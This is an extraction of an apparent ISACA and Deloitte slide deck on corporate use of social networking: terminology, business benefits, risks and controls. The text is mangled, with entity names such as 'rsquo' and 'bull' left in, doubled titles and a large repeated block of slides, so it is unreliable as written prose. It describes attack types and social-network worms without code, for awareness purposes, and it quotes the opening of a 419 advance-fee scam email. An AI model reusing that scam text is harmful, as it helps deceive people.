Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
